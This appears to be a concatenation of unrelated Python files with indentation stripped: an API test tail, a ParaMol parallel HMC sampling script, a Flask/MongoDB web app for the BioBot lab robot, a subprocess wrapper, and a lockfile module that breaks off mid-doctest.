r = requests.put("http://127.0.0.1:8888/api/column/",
cookies=user_cookie)
assert r.status_code == 404
r = requests.put("http://127.0.0.1:8888/api/column/",
cookies=user_cookie,
data={"column": "test_column"})
assert r.status_code == 200
r = requests.put("http://127.0.0.1:8888/api/column/",
cookies=user_cookie,
data={"column": "test_column"})
assert r.status_code == 404
# test get column
r = requests.get("http://127.0.0.1:8888/api/column/")
assert r.status_code == 404
r = requests.get("http://127.0.0.1:8888/api/column/",
params={"column": "test_column"})
assert r.status_code == 200
assert r.json() == []
r = requests.get("http://127.0.0.1:8888/api/column/",
params={"column": "wrong_column"})
assert r.status_code == 404
# test get all column
r = requests.get("http://127.0.0.1:8888/api/getallcolumn/")
assert r.status_code == 200
finally:
stop()
|
example_8_parallel.py
|
import sys
sys.path.insert(0, "/home/treason/PycharmProjects/ParaMol_git_master")
import simtk.unit as unit
import multiprocessing as mp
# ParaMol imports
from ParaMol.System.system import *
# ParaMol Tasks imports
from ParaMol.HMC.hmc_sampler import *
from ParaMol.Utils.settings import *
# --------------------------------------------------------- #
# Preparation #
# --------------------------------------------------------- #
system_names = ["aniline_{}".format(i) for i in range(4)]
systems = []
# Create four identical aniline systems
for name in system_names:
# Create the OpenMM engine for aniline
openmm_system = OpenMMEngine(init_openmm=True, topology_format='AMBER', top_file='aniline.prmtop', crd_format="AMBER", crd_file='aniline.inpcrd')
# Create ParaMol System
systems.append(ParaMolSystem(name=name, engine=openmm_system, n_atoms=14))
# Create ParaMol settings instance
paramol_settings = Settings()
# --------------------------------------------------------- #
# Set the QM Engine #
# --------------------------------------------------------- #
# Create the ASE calculator
from ase.calculators.dftb import *
calc = Dftb(Hamiltonian_='DFTB', # line is included by default
Hamiltonian_MaxSCCIterations=1000,
Hamiltonian_MaxAngularMomentum_='',
Hamiltonian_MaxAngularMomentum_H='s',
Hamiltonian_MaxAngularMomentum_C='p',
Hamiltonian_MaxAngularMomentum_N="p",
Hamiltonian_Dispersion="DftD3 { \n s6=1.000 \n s8=0.5883 \n Damping = BeckeJohnson { \n a1=0.5719 \n a2=3.6017 \n } \n }",
Hamiltonian_SCC='Yes',
Hamiltonian_SCCTolerance=1e-8, )
# Alternative, we could set the calculator in the settings
paramol_settings.qm_engine["ase"]["calculator"] = calc
# -------------------------------------------------------------- #
# Perform the HMC Parallel Sampling #
# -------------------------------------------------------------- #
HMC_samplers = [HMCSampler() for n in range(len(systems))]
output = mp.Queue()
processes_pool = []
for system, sampler in zip(systems, HMC_samplers):
hmc_kwargs = {"settings": paramol_settings,
"systems": [system],
"n_sweeps": 10000,
"n_steps_per_sweep": 100,
"temperature_pot_qm": unit.Quantity(300, unit.kelvin),
"temperature_pot_mm": unit.Quantity(300, unit.kelvin),
"temperature_kin_mm": unit.Quantity(300, unit.kelvin)}
processes_pool.append(mp.Process(target=sampler.run_task, kwargs=hmc_kwargs))
# Run processes
for sampler, system in zip(processes_pool, systems):
print("Starting HMC sampler of system {}".format(system.name))
sampler.start()
# Exit the completed processes
for sampler in processes_pool:
sampler.join()
# Write final data into file
for system in systems:
system.write_data()
|
biobot_web.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import argparse
import base64
from bson import ObjectId
import datetime
from flask import Flask, Markup, Response, abort, escape, flash, redirect, \
render_template, request, url_for
from flask_login import LoginManager, UserMixin, current_user, login_required, \
login_user, logout_user
from functools import wraps
from gridfs import GridFS
from jinja2 import evalcontextfilter
import json
import hashlib
import pandas as pd
import pymongo
import re
import subprocess
import threading
import time
import uuid
import webcolors
import biobot_schema
def hash_password(password):
"""This function hashes the password with SHA256 and a random salt"""
salt = uuid.uuid4().hex
return hashlib.sha256(salt.encode() + password.encode()).hexdigest() + ':' + salt
def check_password(hashed_password, user_password):
"""This function checks a password against a SHA256:salt entry"""
password, salt = hashed_password.split(':')
return password == hashlib.sha256(salt.encode() + user_password.encode()).hexdigest()
def admin_required(func):
"""Function wrapper to allow only logged in admins to access the page."""
@wraps(func)
def decorated_function(*args, **kwargs):
if not current_user.is_admin():
return redirect(url_for('bad_permissions'))
return func(*args, **kwargs)
return decorated_function
def valid_protocol(protocol):
"""Verify if the requested biological protocol exists."""
if protocol in client.database_names() and protocol.startswith('protocol'):
return True
else:
flash("Protocol {0} does not exist".format(protocol), 'warning')
return False
# Color functions used for BCA
def closest_color(requested_color):
"""Find the closest color name from an 8 bits RGB tuple."""
min_colors = {}
for key, name in webcolors.css21_hex_to_names.items():
r_c, g_c, b_c = webcolors.hex_to_rgb(key)
rd = (r_c - requested_color[0]) ** 2
gd = (g_c - requested_color[1]) ** 2
bd = (b_c - requested_color[2]) ** 2
min_colors[(rd + gd + bd)] = name
return min_colors[min(min_colors.keys())]
def get_color_name(requested_color):
"""Get the exact or closest color name of an 8 bit RGB tuple."""
try:
color_name = webcolors.rgb_to_name(requested_color)
except ValueError:
color_name = closest_color(requested_color)
return color_name
# Load default configuration from local file
with open('config.json') as config:
conf = argparse.Namespace(**json.load(config))
# Argument parser strings
app_description = "BioBot Website Application\n\n" \
"All information can be found at https://github.com/biobotus.\n" \
"Modify file 'config.json' to edit the application's configuration.\n" \
"There are other command line arguments that can be used:"
help_host = "Hostname of the Flask app. Default: {0}".format(conf.app_host)
help_port = "Port of the Flask app. Default: {0}".format(conf.app_port)
help_debug = "Start Flask app in debug mode. Default: {0}".format(conf.debug)
# Set up the command-line arguments
parser = argparse.ArgumentParser(description=app_description,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-H', '--app_host', help=help_host, default=conf.app_host)
parser.add_argument('-P', '--app_port', help=help_port, default=conf.app_port)
parser.add_argument('-D', '--debug', dest='debug', action='store_true', help=help_debug)
parser.set_defaults(debug=conf.debug)
# Update default configs with command line args
args = parser.parse_args()
conf.__dict__.update(args.__dict__)
# Get MongoDB Database Client
client = pymongo.MongoClient()
biobot = client['biobot']
fs = GridFS(biobot)
# Validate MongoDB is started, else exit
try:
client.server_info()
except pymongo.errors.ServerSelectionTimeoutError:
print('MongoDB is not started. Restart it before launching the web app again.')
quit()
# Create Flask Application
app = Flask(__name__)
app.secret_key = uuid.uuid4().hex # Required to use log in and session manager
login_manager = LoginManager()
login_manager.init_app(app)
# ROS variable
ros_pid = None
# User class
class User(UserMixin):
"""User Class making DB-stored parameters accessible from HTML templates."""
def __init__(self, username):
self.username = username
user = biobot.credentials.find_one({'username': username})
self.admin = user['admin']
def get_id(self):
return self.username
def is_admin(self):
return self.admin
# Login Manager Configuration
@login_manager.user_loader
def load_user(user_id):
return User(user_id)
@login_manager.unauthorized_handler
def unauthorized_callback():
return redirect('/login?next=' + request.path)
# Application routes
@app.route('/')
def go_home():
return redirect(url_for('home'))
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
next_page = request.args.get('next')
username = request.form['username']
password = request.form['password']
user = biobot.credentials.find_one({'username': username})
if user and check_password(user['password'], password):
if user['active']: # Inactived users should not be able to log in
login_user(User(username))
biobot.credentials.update_one(user, {'$set':
{'last_login' : time.time()}})
# If an admin logs in and there is at least one inactived user, show it
if user['admin'] and biobot.credentials.find_one({'active': False}):
flash('At least one user account has to be activated', 'info')
return redirect(url_for('manage_users'))
return redirect(next_page or url_for('home'))
else:
flash('Account not yet activated by an administrator', 'warning')
else:
flash('Invalid credentials', 'danger')
return render_template('login.html')
else:
return render_template('login.html')
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/create_account', methods=['GET', 'POST'])
def create_account():
if request.method == 'POST':
next = request.args.get('next')
username = request.form['username'].strip()
password = request.form['password']
password_confirm = request.form['password_confirm']
if not password:
flash('Password cannot be empty', 'danger')
return render_template('create_account.html')
if password != password_confirm:
flash('Both password entries do not match', 'danger')
return render_template('create_account.html')
if not username.replace('_', '').isalnum():
# Only allow letters, numbers and underscore characters in usernames
flash('Invalid username (letters, numbers and underscores only)', 'danger')
return render_template('create_account.html')
user = biobot.credentials.find_one({'username': username})
if user or not username: # Check if username is not empty or already taken
flash('Username not available', 'danger')
return render_template('create_account.html')
active = False
admin = False
# If this is the first user to register, make it active and admin
if not biobot.credentials.find_one():
active = True
admin = True
flash('First account created, activated and is administrator, congratulations!', 'success')
# Create a new user account
biobot.credentials.insert_one({'username': username,
'password': hash_password(password),
'active': active,
'admin': admin})
flash('Account created successfully', 'success')
return redirect(url_for('login'))
else:
return render_template('create_account.html')
@app.route('/change_password', methods=['GET', 'POST'])
def change_password():
if request.method == 'POST':
username = request.form['username']
old_password = request.form['old_password']
new_password = request.form['new_password']
user = biobot.credentials.find_one({'username': username})
if user and check_password(user['password'], old_password):
if not new_password:
flash('Password cannot be empty', 'danger')
return render_template('change_password.html')
# Modify password
biobot.credentials.update_one(user, {'$set': {
'password': hash_password(new_password)}})
flash('Password changed successfully', 'success')
return redirect(url_for('login'))
else:
flash('Invalid credentials', 'danger')
return render_template('change_password.html')
else:
return render_template('change_password.html')
def ros_thread():
"""Run shell command defined as 'roslaunch' in config file to start ROS."""
global ros_pid
try:
popen = subprocess.Popen(conf.roslaunch.split())
ros_pid = popen.pid
return_code = popen.wait()
if return_code:
print("subprocess.CalledProcessError: Command '{0}' returned non-zero exit status {1}".format(conf.roslaunch, return_code))
finally:
ros_pid = None
@app.route('/ros_status')
@login_required
@admin_required
def ros_status():
return render_template('ros_status.html', pid=ros_pid)
@app.route('/ros_start')
@login_required
@admin_required
def ros_start():
if not ros_pid:
threading.Thread(target=ros_thread).start()
return redirect(url_for('ros_status'))
@app.route('/ros_stop')
@login_required
@admin_required
def ros_stop():
if ros_pid:
subprocess.call("kill -15 {}".format(ros_pid), shell=True)
return redirect(url_for('ros_status'))
@app.route('/home')
def home():
return render_template('index.html')
@app.route('/surveillance')
def surveillance():
return render_template('surveillance.html')
@app.route('/control')
@login_required
def control():
return render_template('control.html')
@app.route('/protocol_editor')
@login_required
def protocol_editor():
labware = json.loads(get_schema('labware'))
return render_template('protocol_editor.html', labware=labware)
@app.route('/deck_editor')
@login_required
def deck_editor():
return render_template('deck_editor.html')
@app.route('/deck_editor/send/<b64_deck>')
@login_required
def receive_deck(b64_deck):
deck = json.loads(base64.b64decode(b64_deck).decode('utf-8'))
if deck: # Prevent empty list that would make insert_many crash
for i in range(len(deck)):
# Add extra tags used by application
deck[i]['source'] = 'deck_editor'
deck[i]['uuid'] = uuid.uuid4().hex
deck[i]['validated'] = False
biobot.deck.insert_many(deck)
return redirect(url_for('mapping'))
@app.route('/mapping')
@login_required
def mapping():
from_editor = list(biobot.deck.find({'source': 'deck_editor', 'validated': False}))
from_carto = list(biobot.deck.find({'source': '3d_cartography', 'validated': False}))
validated = list(biobot.deck.find({'validated': True}))
if from_editor or from_carto:
flash('Some labware location has to be validated.', 'warning')
elif len(validated) == 0:
flash('No labware has been found.', 'danger')
else:
flash('All labware has been validated.', 'success')
return render_template('mapping.html', from_editor=from_editor,
from_carto=from_carto, validated=validated)
@app.route('/mapping/delete/<uid>')
@login_required
def mapping_delete(uid):
item = biobot.deck.find_one({'uuid': uid})
if item:
if item['source'] == '3d_cartography':
# Picture of items coming from 3D cartography has to be deleted
fs.delete(item['image_id'])
biobot.deck.delete_one(item)
return redirect(url_for('mapping'))
@app.route('/mapping/modify/<uid>')
@login_required
def mapping_modify(uid):
biobot.deck.update_one({'uuid': uid}, {'$set': {'validated': False}})
return redirect(url_for('mapping'))
@app.route('/mapping/validate/<uid>', methods=['GET', 'POST'])
@login_required
def mapping_validate(uid):
if request.method == 'GET':
item = biobot.deck.find_one({'uuid': uid})
# Get a list of not tools labware options for item type dropdown menu
deck_cursor = biobot.labware.find({'class': {'$ne': 'Tool'}})
deck = sorted([item['type'] for item in deck_cursor])
options = "<option value={0}>{1}</option>"
all_options = [options.format(i, i.replace('_', ' ').title()) for i in deck]
labware_options = Markup(''.join(all_options))
# Get items' approximate coordinates
if item['source'] == 'deck_editor':
ini = {'x': round(conf.deck_length/100*int(item['col'])+conf.deck_length/200, 3),
'y': round(conf.deck_width/26*(ord(item['row'])-65)+conf.deck_width/52, 3)}
else:
ini = {'x': round(item['carto_x'], 3),
'y': round(item['carto_y'], 3)}
return render_template('validate.html', item=item, ini=ini, \
labware_options=labware_options)
else:
if request.form['valid_x'] != '' and request.form['valid_y'] != '' and \
request.form['valid_z'] != '':
try:
biobot.deck.update_one({'uuid': uid},
{'$set': {'type': request.form['type'],
'name': request.form['name'],
'valid_x': float(request.form['valid_x']),
'valid_y': float(request.form['valid_y']),
'valid_z': float(request.form['valid_z']),
'validated': True}})
return redirect(url_for('mapping'))
except ValueError:
# Could happen if manually entered value is not a float
# The manual coordinate entry is only available to admins
flash('Coordinates must be floating point numbers only.', 'danger')
else:
flash('Cannot validate item with empty coordinates', 'danger')
return redirect(request.url)
@app.route('/logs')
def logs():
stats = list(biobot.stats.find())
return render_template('logs.html', stats=stats)
@app.route('/logs/<protocol>')
def log_highlights(protocol):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
# Get database of current protocol
db = client[protocol]
started = db.steps.count()
done = db.steps.count({'end': {'$exists': True}})
info = db.protocol.find_one()
json_protocol = {}
if info:
# Pretty print the raw protocol
json_protocol = json.dumps(info['protocol'], indent=4, sort_keys=True)
return render_template('log_highlights.html', active='Highlights', \
protocol=protocol, json_protocol=json_protocol, \
started=started, done=done, db=db)
@app.route('/logs/<protocol>/steps')
def log_steps(protocol):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
db = client[protocol]
steps = list(db.steps.find())
return render_template('log_steps.html', active='Steps', protocol=protocol, \
steps=steps, db=db)
@app.route('/logs/<protocol>/bca')
@app.route('/logs/<protocol>/bca/step/<int:step>')
def log_bca(protocol, step=None):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
db = client[protocol]
colonies = list(db.colonies.find({'operation': 'analysis'}))
if not colonies:
flash("No bacterial colonies was found for protocol {0}".format(protocol), 'warning')
return redirect("/logs/{0}".format(protocol))
df = pd.DataFrame(colonies)
steps = sorted(df.step.unique())
if step is None:
# If no step is entered, return first
# step for which there was an analysis in the protocol
return redirect("{0}/step/{1}".format(request.url, steps[0]))
current_colonies = list(db.colonies.find({'step': step, 'operation': 'analysis'}))
# Add closest color names and retrieve list of unique colors
df = pd.DataFrame(current_colonies)
df['color_text'] = df.color.apply(webcolors.hex_to_rgb).apply(get_color_name)
colors = list(df.color_text.unique())
# Convert back DataFrame to list of dictionnaries
current_colonies = [x.to_dict() for _, x in df.iterrows()]
# Information about pictures to display in the page
pictures = [{
'title': 'Raw',
'description': 'Raw picture of the Petri dish',
'filename': "raw_{}.jpg".format(step)
},{
'title': 'Analysis',
'description': 'Highlighted colonies have been characterized',
'filename': "analysis_{}.jpg".format(step)
}]
return render_template('log_bca.html', active='BCA', protocol=protocol, \
steps=steps, current=step, colonies=current_colonies, \
colors=colors, db=db, pictures=pictures)
@app.route('/logs/<protocol>/picking/<pick_num>')
@app.route('/logs/<protocol>/picking/<pick_num>/step/<int:step>')
def log_picking(protocol, pick_num, step=None):
if not valid_protocol(protocol):
return redirect(url_for('logs'))
db = client[protocol]
colonies = list(db.colonies.find({'operation': pick_num}))
if not colonies:
flash("No bacterial colonies was found for protocol {0}".format(protocol), 'warning')
return redirect("/logs/{0}".format(protocol))
steps = sorted(pd.DataFrame(colonies).step.unique())
if step is None:
# If no step is entered, return first
# step for which there was an analysis in the protocol
return redirect("{0}/step/{1}".format(request.url, steps[0]))
current_colonies = list(db.colonies.find({'step': step, 'operation': pick_num}))
# Add closest color names and retrieve list of unique colors
df = pd.DataFrame(current_colonies)
df['color_text'] = df.color.apply(webcolors.hex_to_rgb).apply(get_color_name)
colors = list(df.color_text.unique())
# Convert back DataFrame to list of dictionnaries
current_colonies = [x.to_dict() for _, x in df.iterrows()]
# Get picking criterias
characteristics = db.picking.find_one({'step': step, 'pick_num': pick_num})
# Information about pictures to display in the page
pictures = [{
'title': 'Raw',
'description': 'Raw picture of the Petri dish',
'filename': "raw_{}.jpg".format(step)
},{
'title': 'Colony Picking',
'description': 'Highlighted colonies have been selected for picking',
'filename': "{}_{}.jpg".format(pick_num, step)
}]
return render_template('log_picking.html', active='BCA', protocol=protocol, \
steps=steps, current=step, colonies=current_colonies, \
colors=colors, db=db, pictures=pictures,
characteristics=characteristics, pick_num=pick_num)
@app.route('/logs/delete/<protocol>')
@login_required
@admin_required
def delete_logs(protocol):
if not valid_protocol(protocol):
flash("Cannot delete unexisting protocol {0}".format(protocol), 'danger')
return redirect(url_for('logs'))
# Delete all data from current protocol
biobot.stats.delete_one({'id': protocol})
images = list(biobot.bca_images.find({'protocol': 'protocol'}))
for img in images:
fs.delete(img['image_id'])
biobot.bca_images.delete_many({'protocol': protocol})
client.drop_database(protocol)
flash("Entry {0} deleted successfully".format(protocol), 'info')
return redirect(url_for('logs'))
@app.route('/manage_users')
@login_required
@admin_required
def manage_users():
user_list = list(biobot.credentials.find())
return render_template('manage_users.html', users=user_list)
@app.route('/manage_users/activate/<username>')
@login_required
@admin_required
def activate_user(username):
"""Activate a user account."""
user = biobot.credentials.find_one({'username': username})
if not user['active']:
biobot.credentials.update_one(user, {'$set': {'active': True}})
flash("User {0} activated successfully".format(username), 'success')
else:
flash("User {0} is already active".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_users/demote/<username>')
@login_required
@admin_required
def demote_user(username):
"""Remove admin privileges of another administrator."""
user = biobot.credentials.find_one({'username': username})
if current_user.get_id() == username:
flash('Cannot revert yourself to standard user', 'danger')
elif user:
if user['admin']:
biobot.credentials.update_one(user, {'$set': {'admin': False}})
flash("User {0} reverted to standard user successfully".format(username), 'info')
else:
flash("User {0} is already a standard user".format(username), 'warning')
else:
flash("Cannot revert unknown user {0} to standard user".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_users/promote/<username>')
@login_required
@admin_required
def promote_user(username):
"""Give admin privileges from a normal user."""
user = biobot.credentials.find_one({'username': username})
if user:
if user['admin']:
flash("User {0} is already an administrator".format(username), 'warning')
else:
biobot.credentials.update_one(user, {'$set': {'admin': True}})
flash("User {0} promoted to administrator successfully".format(username), 'info')
else:
flash("Cannot promote unknown user {0} to administrator".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_users/delete/<username>')
@login_required
@admin_required
def delete_user(username):
"""Delete a user account that is not yours."""
user = biobot.credentials.find_one({'username': username})
if current_user.get_id() == username:
flash('Cannot delete yourself', 'danger')
elif user:
biobot.credentials.delete_one(user)
flash("User {0} deleted successfully".format(username), 'info')
else:
flash("Cannot delete unknown user {0}".format(username), 'warning')
return redirect(url_for('manage_users'))
@app.route('/manage_labware', methods=['GET', 'POST'])
@login_required
@admin_required
def manage_labware():
if request.method == 'POST':
# Add a new labware entry
item_type = request.form['type'].lower().strip().replace(' ', '_')
description = request.form['description']
item_class = request.form['class']
item = biobot.labware.find_one({'type': item_type})
if not item_type:
flash('Empty labware item type is invalid', 'danger')
elif item:
flash("Labware item {0} already exists".format(item_type), 'warning')
else:
biobot.labware.insert_one({'type': item_type, 'description': description, 'class': item_class})
flash("Labware item {0} added successfully".format(item_type), 'success')
labware_list = list(biobot.labware.find())
return render_template('manage_labware.html', labware=labware_list)
@app.route('/manage_labware/delete/<item_type>')
@login_required
@admin_required
def delete_labware(item_type):
item = biobot.labware.find_one({'type': item_type})
if item:
biobot.labware.delete_one(item)
flash("Item {0} deleted successfully".format(item_type), 'info')
else:
flash("Cannot delete unknown item {0}".format(item_type), 'danger')
return redirect(url_for('manage_labware'))
@app.route('/manage_labware/edit_tools')
@login_required
@admin_required
def edit_tools():
# Get tools physical configuration from its config file
try:
with open('tools_conf.json', 'r') as f:
tools = json.load(f)
except EnvironmentError:
tools = []
return render_template('edit_tools.html', tools=Markup(tools))
@app.route('/manage_labware/edit_tools/save/<b64_tools>')
@login_required
@admin_required
def save_tools(b64_tools):
# Overwite tools config file with new tools data
tools = json.loads(base64.b64decode(b64_tools).decode('utf-8'))
with open('tools_conf.json', 'w') as f:
json.dump(tools, f)
return redirect(url_for('edit_tools'))
@app.route('/bad_permissions')
def bad_permissions():
"""Function called if a normal user tries to get to an admin reserved page."""
return render_template('bad_permissions.html')
@app.route('/get/schema/<value>')
def get_schema(value):
"""
Returns the JSON Schema asked by JavaScript Ajax Request.
If schema does not exist, it returns an empty JSON object.
"""
schema = biobot_schema.get_schema(value, conf, biobot)
return json.dumps(schema)
@app.errorhandler(404)
def page_not_found(error):
"""This method handles all unexisting route requests."""
return render_template('404.html'), 404
# Add objects that can be called from the Jinja2 HTML templates
@app.template_filter()
@evalcontextfilter
def nl2br(eval_ctx, value):
"""Converts new lines to paragraph breaks in HTML."""
_paragraph_re = re.compile(r'(?:\r\n|\r|\n){2,}')
result = '\n\n'.join('<p>%s</p>' % p.replace('\n', '<br>\n') \
for p in _paragraph_re.split(escape(value)))
result = result.replace(' ', ' ')
if eval_ctx.autoescape:
result = Markup(result)
return result
def convert_ts(ts):
"""Convert timestamp to human-readable string"""
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
def format_sidebar(name, icon, url):
"""
Used to generate HTML line for sidebar in layout.html.
- name is the name of the tab
- icon is the glyphicon name
"""
current_url = request.path.split('/')[1]
active = ' class="active"' if url == current_url else ''
html = '<li{0}><a href="/{1}"><i style="float:left; margin-right: 14px;">' \
'<span class="glyphicon glyphicon-{2}"></span></i>{3}' \
'</a></li>'.format(active, url, icon, name)
return Markup(html)
def get_item_picture(filename, tags=""):
"""Return the picture of the requested deck item. (filenames are uid.jpg)"""
image = biobot.deck.find_one({'filename': filename})
if image:
image_id = image['image_id']
img = fs.get(image_id).read()
b64data = base64.b64encode(img).decode('utf-8')
html = '<img src="data:image/jpeg;base64,{0}" {1}>'.format(b64data, tags)
else:
html = '<img alt="Image {0} not found" {1}>'.format(filename, tags)
return Markup(html)
def get_bca_picture(filename, protocol, step, tags=""):
"""Return the picture of the requested BCA picture, with click download and optional tags."""
image = biobot.bca_images.find_one({'protocol': protocol, 'step': step, 'filename': filename})
if image:
image_id = image['image_id']
try:
img = fs.get(image_id).read()
b64data = base64.b64encode(img).decode('utf-8')
img_html = '<img src="data:image/jpeg;base64,{0}" {1}>'.format(b64data, tags)
html = '<a href="data:image/jpeg;base64,{0}" download="{1}">{2}</a>'.format(b64data, filename, img_html)
return Markup(html)
except:
pass
else:
pass
html = '<img alt="Image {0} not found" {1}>'.format(filename, tags)
return Markup(html)
# Make some variables and functions available from Jinja2 HTML templates
app.jinja_env.globals.update(conf=conf,
force_type = Markup('onselect="return false" ' \
'onpaste="return false" ' \
'oncopy="return false" ' \
'oncut="return false" ' \
'ondrag="return false" ' \
'ondrop="return false" ' \
'autocomplete=off'),
format_sidebar=format_sidebar,
convert_ts=convert_ts,
get_item_picture=get_item_picture,
get_bca_picture=get_bca_picture)
# Start the application
if __name__ == '__main__':
app.run(debug=conf.debug, host=conf.app_host, port=int(conf.app_port))
|
process.py
|
# ============================================================================
# FILE: process.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
import subprocess
from threading import Thread
from queue import Queue
from time import time
import os
class Process(object):
def __init__(self, commands, context, cwd):
startupinfo = None
if os.name == 'nt':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
self.__proc = subprocess.Popen(commands,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
startupinfo=startupinfo,
cwd=cwd)
self.__eof = False
self.__context = context
self.__queue_out = Queue()
self.__thread = Thread(target=self.enqueue_output)
self.__thread.start()
def eof(self):
return self.__eof
def kill(self):
if not self.__proc:
return
self.__proc.kill()
self.__proc.wait()
self.__proc = None
self.__queue_out = None
self.__thread.join(1.0)
self.__thread = None
def enqueue_output(self):
for line in self.__proc.stdout:
if not self.__queue_out:
return
self.__queue_out.put(
line.decode(self.__context['encoding'],
errors='replace').strip('\r\n'))
def communicate(self, timeout):
if not self.__proc:
return ([], [])
start = time()
outs = []
while not self.__queue_out.empty() and time() < start + timeout:
outs.append(self.__queue_out.get_nowait())
if self.__thread.is_alive() or not self.__queue_out.empty():
return (outs, [])
_, errs = self.__proc.communicate(timeout=timeout)
errs = errs.decode(self.__context['encoding'],
errors='replace').splitlines()
self.__eof = True
self.__proc = None
self.__thread = None
self.__queue = None
return (outs, errs)
|
lockfile.py
|
"""
lockfile.py - Platform-independent advisory file locks.
Requires Python 2.5 unless you apply 2.4.diff
Locking is done on a per-thread basis instead of a per-process basis.
Usage:
>>> lock = FileLock(_testfile())
>>> try:
... lock.acquire()
... except AlreadyLocked:
... print _testfile(), 'is locked already.'
... except LockFailed:
... print _testfile(), 'can\\'t be locked.'
... else:
... print 'got lock'
got lock
>>> print lock.is_locked()
True
>>> lock.release()
>>> lock = FileLock(_testfile())
>>> print lock.is_locked()
False
>>> with lock:
... print lock.is_locked()
True
>>> print lock.is_locked()
False
>>> # It is okay to lock twice from the same thread...
>>> with lock:
... lock.acquire()
...
>>> # Though no counter is kept, so you can't unlock multiple times...
>>> print lock.is_locked()
False
Exceptions:
Error - base class for other exceptions
LockError - base class for all locking exceptions
AlreadyLocked - Another thread or process already holds the lock
LockFailed - Lock failed for some other reason
UnlockError - base class for all unlocking exceptions
AlreadyUnlocked - File was not locked.
NotMyLock - File was locked but not by the current thread/process
To do:
* Write more test cases
- verify that all lines of code are executed
* Describe on-disk file structures in the documentation.
"""
from __future__ import division, with_statement
import socket
import os
import threading
import time
import errno
import thread
class Error(Exception):
"""
Base class for other exceptions.
>>> try:
... raise Error
... except Exception:
... pass
"""
pass
class LockError(Error):
"""
Base class for error arising from attempts to acquire the lock.
>>> try:
... raise LockError
... except Error:
... pass
"""
pass
class LockTimeout(LockError):
"""Raised when lock creation fails within a user-defined period of time.
>>> try:
... raise LockTimeout
... except LockError:
... pass
"""
pass
class AlreadyLocked(LockError):
"""Some other thread/process is locking the file.
>>> try:
... raise AlreadyLocked
... except LockError:
... pass
"""
pass
class LockFailed(LockError):
"""Lock file creation failed for some other reason.
>>> try:
... raise LockFailed
... except LockError:
... pass
"""
pass
class UnlockError(Error):
"""
Base class for errors arising from attempts to release the lock.
>>> try:
... raise UnlockError
... except Error:
... pass
"""
pass
class NotLocked(UnlockError):
"""Raised when an attempt is made to unlock an unlocked file.
>>> try:
... raise NotLocked
... except UnlockError:
... pass
"""
pass
class NotMyLock(UnlockError):
"""Raised when an attempt is made to unlock a file someone else locked.
>>> try:
... raise NotMyLock
... except UnlockError:
... pass
"""
pass
class LockBase:
"""Base class for platform-specific lock classes."""
def __init__(self, path, threaded=True):
"""
>>> lock = LockBase(_testfile())
"""
self.path = path
self.lock_file = os.path.abspath(path) + ".lock"
self.hostname = socket.gethostname()
self.pid = os.getpid()
if threaded:
tname = "%x-" % thread.get_ident()
else:
tname = ""
dirname = os.path.dirname(self.lock_file)
self.unique_name = os.path.join(dirname,
"%s.%s%s" % (self.hostname,
tname,
self.pid))
def acquire(self, timeout=None):
"""
Acquire the lock.
* If timeout is omitted (or None), wait forever trying to lock the
file.
* If timeout > 0, try to acquire the lock for that many seconds. If
the lock period expires and the file is still locked, raise
LockTimeout.
* If timeout <= 0, raise AlreadyLocked immediately if the file is
already locked.
>>> # As simple as it gets.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock.release()
>>> # No timeout test
>>> e1, e2 = threading.Event(), threading.Event()
>>> t = _in_thread(_lock_wait_unlock, e1, e2)
>>> e1.wait() # wait for thread t to acquire lock
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> lock2.i_am_locking()
False
>>> try:
... lock2.acquire(timeout=-1)
... except AlreadyLocked:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'thread', threading.currentThread().getName(),
... print 'erroneously locked an already locked file.'
... lock2.release()
...
>>> e2.set() # tell thread t to release lock
>>> t.join()
>>> # Timeout test
>>> e1, e2 = threading.Event(), threading.Event()
>>> t = _in_thread(_lock_wait_unlock, e1, e2)
>>> e1.wait() # wait for thread t to acquire filelock
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> try:
... lock2.acquire(timeout=0.1)
... except LockTimeout:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... lock2.release()
... print 'thread', threading.currentThread().getName(),
... print 'erroneously locked an already locked file.'
...
>>> e2.set()
>>> t.join()
"""
pass
def release(self):
"""
Release the lock.
If the file is not locked, raise NotLocked.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock.release()
>>> lock.is_locked()
False
>>> lock.i_am_locking()
False
>>> try:
... lock.release()
... except NotLocked:
... pass
... except NotMyLock:
... print 'unexpected exception', NotMyLock
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'erroneously unlocked file'
>>> e1, e2 = threading.Event(), threading.Event()
>>> t = _in_thread(_lock_wait_unlock, e1, e2)
>>> e1.wait()
>>> lock2 = FileLock(_testfile())
>>> lock2.is_locked()
True
>>> lock2.i_am_locking()
False
>>> try:
... lock2.release()
... except NotMyLock:
... pass
... except Exception, e:
... print 'unexpected exception', repr(e)
... else:
... print 'erroneously unlocked a file locked by another thread.'
...
>>> e2.set()
>>> t.join()
"""
pass
def is_locked(self):
"""
Tell whether or not the file is locked.
>>> lock = FileLock(_testfile())
>>> lock.acquire()
>>> lock.is_locked()
True
>>> lock.release()
>>> lock.is_locked()
False
"""
pass
def i_am_locking(self):
"""Return True if this object is locking the file.
>>> lock1 = FileLock(_testfile(), threaded=False)
>>> lock1.acquire()
>>> lock2 = FileLock(_testfile())
>>> lock1.i_am_locking()
True
>>> lock2.i_am_locking()
False
>>> try:
... lock2.acquire(timeout=2)
